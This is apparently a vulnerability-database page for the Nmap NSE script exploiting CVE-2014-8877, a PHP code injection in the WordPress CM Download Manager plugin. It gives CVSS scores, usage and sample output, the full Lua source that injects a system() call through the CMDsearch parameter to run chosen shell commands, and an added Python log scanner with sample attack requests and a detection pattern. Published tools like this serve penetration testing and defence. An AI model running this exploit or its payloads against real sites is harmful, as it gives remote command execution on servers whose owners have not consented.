http-vuln-cve2014-8877 NSE Script

2015-11-11 17:02:28
Mariusz Ziulek <mzet()owasp org>
nmap.org

CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 10 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS: 0.973 High
Percentile: 99.8%

Exploits a remote code injection vulnerability (CVE-2014-8877) in Wordpress CM Download Manager plugin. Versions <= 2.0.0 are known to be affected.

The CM Download Manager plugin does not correctly sanitise user input, which allows remote attackers to execute arbitrary PHP code via the CMDsearch parameter to cmdownloads/; the parameter value is processed by the PHP 'create_function' function.

The script injects a call to PHP's system() function into the vulnerable target in order to execute the specified shell command.
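As an added, defender-side example (not part of the NSE script or of the Nmap project), the following Python scans Apache access-log lines for requests to cmdownloads/ whose CMDsearch value carries the string-literal breakout the script relies on. The log format, the sample lines and the marker list are assumptions; the log lines are constructed, not captured traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines (not real traffic). The first two mirror
# the probe and the command request shapes the NSE script sends; the rest are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Nov/2015:17:02:28 +0000] "GET /wordpress/cmdownloads/?CMDsearch=%22.base64_decode%28%22YWJjZGVmZ2hpamtsbW5v%22%29.%22 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
203.0.113.5 - - [11/Nov/2015:17:02:29 +0000] "GET /wordpress/cmdownloads/?CMDsearch=%22.system%28%22echo%20abcde%3Buname%20-a%3Becho%20abcde%3B%22%29.%22 HTTP/1.1" 200 5200 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
198.51.100.7 - - [11/Nov/2015:17:05:00 +0000] "GET /wordpress/cmdownloads/?CMDsearch=annual+report HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
198.51.100.9 - - [11/Nov/2015:17:06:00 +0000] "GET /wordpress/?p=12 HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client, ident, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# A closing quote followed by PHP's concatenation operator breaks out of the
# string literal that create_function() wraps the parameter in; a direct call
# to an exec/eval primitive is flagged as well. Marker list is an assumption.
INJECTION_RE = re.compile(
    r'"\s*\.|\b(?:system|exec|passthru|shell_exec|eval|base64_decode)\s*\(', re.I)


def decode_cmdsearch(target):
    """Return the URL-decoded CMDsearch values of a request to cmdownloads/, else []."""
    parts = urlsplit(target)
    if not parts.path.rstrip('/').endswith('/cmdownloads'):
        return []
    return parse_qs(parts.query, keep_blank_values=True).get('CMDsearch', [])


def scan_log(text):
    """Return one finding per request whose CMDsearch value looks like PHP injection."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for value in decode_cmdsearch(m.group('target')):
            if INJECTION_RE.search(value):
                findings.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                                 'status': int(m.group('status')), 'payload': value})
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} CMDsearch={f['payload']!r}")
```

A 200 response to a flagged request is not proof of compromise by itself, since the plugin returns 200 for any search; the decoded payload is what tells a probe apart from a real search term.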

Script Arguments

http-vuln-cve2014-8877.cmd

Command to execute. Default: nil

http-vuln-cve2014-8877.uri

Wordpress root directory on the website. Default: /

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

vulns.short, vulns.showall

See the documentation for the vulns library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

Example Usage

nmap --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" <target>
nmap --script http-vuln-cve2014-8877 <target>

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-vuln-cve2014-8877:
|   VULNERABLE:
|   Code Injection in Wordpress CM Download Manager plugin
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-8877
|       CM Download Manager plugin does not correctly sanitise the user input
|       which allows remote attackers to execute arbitrary PHP code via the
|       CMDsearch parameter to cmdownloads/, which is processed by the PHP
|       'create_function' function.
|
|     Disclosure date: 2014-11-14
|     Exploit results:
|       Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
|     References:
|_      https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8877

Requires


local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local url = require "url"
local vulns = require "vulns"
local base64 = require "base64"
local rand = require "rand"

description = [[
Exploits a remote code injection vulnerability (CVE-2014-8877) in Wordpress CM
Download Manager plugin. Versions <= 2.0.0 are known to be affected.

CM Download Manager plugin does not correctly sanitise the user input which
allows remote attackers to execute arbitrary PHP code via the CMDsearch
parameter to cmdownloads/, which is processed by the PHP 'create_function'
function.

The script injects PHP system() function into the vulnerable target in order to
execute specified shell command.
]]

---
-- @usage
-- nmap --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" <target>
-- nmap --script http-vuln-cve2014-8877 <target>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-vuln-cve2014-8877:
-- |   VULNERABLE:
-- |   Code Injection in Wordpress CM Download Manager plugin
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2014-8877
-- |       CM Download Manager plugin does not correctly sanitise the user input
-- |       which allows remote attackers to execute arbitrary PHP code via the
-- |       CMDsearch parameter to cmdownloads/, which is processed by the PHP
-- |       'create_function' function.
-- |
-- |     Disclosure date: 2014-11-14
-- |     Exploit results:
-- |       Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
-- |     References:
-- |_      https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8877
--
-- @args http-vuln-cve2014-8877.uri Wordpress root directory on the website. Default: /
-- @args http-vuln-cve2014-8877.cmd Command to execute. Default: nil
---

author = "Mariusz Ziulek <mzet()owasp org>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive", "exploit"}

portrule = shortport.http

-- Builds and sends the GET request against cmdownloads/. With cmd set, the
-- injected PHP calls system(); otherwise a base64_decode() of a random
-- string is injected, so that string's presence in the response proves
-- the parameter is evaluated as code.
function genHttpReq(host, port, uri, cmd)
  local rnd = nil
  local payload = nil
  local vulnPath = '/cmdownloads/?CMDsearch='

  -- the leading '".' closes the string literal inside the create_function
  -- body and the trailing '."' reopens it, so the generated PHP stays valid
  if cmd ~= nil then
    payload = '".system("'..cmd..'")."'
  else
    rnd = rand.random_alpha(15)
    local encRnd = base64.enc(rnd)
    payload = '".base64_decode("'..encRnd..'")."'
  end

  local finalUri = uri..vulnPath..url.escape(payload)
  local req = http.get(host, port, finalUri)

  stdnse.debug(1, ("Sending GET '%s%s%s' request"):format(uri, vulnPath, payload))

  if not(rnd) then
    return req
  else
    return req, rnd
  end
end

action = function(host, port)
  local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/'
  local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil

  -- detection probe: no command, just the random marker string
  local req, rnd = genHttpReq(host, port, uri, nil)

  -- check if target is vulnerable (guard against a missing body)
  if req.status == 200 and req.body and string.match(req.body, rnd) ~= nil then
    local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
    local vuln = {
      title = 'Code Injection in Wordpress CM Download Manager plugin',
      state = vulns.STATE.NOT_VULN,
      description = [[
CM Download Manager plugin does not correctly sanitise the user input
which allows remote attackers to execute arbitrary PHP code via the
CMDsearch parameter to cmdownloads/, which is processed by the PHP
'create_function' function.
      ]],
      IDS = {CVE = 'CVE-2014-8877'},
      references = {
          'www.securityfocus.com/bid/71204/'
      },
      dates = {
          disclosure = {year = '2014', month = '11', day = '14'},
      },
    }
    stdnse.debug(1, string.format("Random string '%s' was found in the body response. Host seems to be vulnerable.", rnd))
    vuln.state = vulns.STATE.EXPLOIT

    -- exploit the vulnerability
    if cmd ~= nil then
       -- wrap cmd with pattern which is used to filter out only relevant output from the response
       local pattern = rand.random_alpha(5)
       req = genHttpReq(host, port, uri, 'echo '..pattern..';'..cmd..';echo '..pattern..';')

       if req.status == 200 then
         -- take first lazy match as command output
         local cmdOut = nil
         for m in string.gmatch(req.body, pattern..'\n(.-)\n'..pattern) do
           cmdOut = m
           break
         end

         if cmdOut ~= nil then
           vuln.exploit_results = cmdOut
         end
       end
    end

    return vulnReport:make_output(vuln)
  end
end
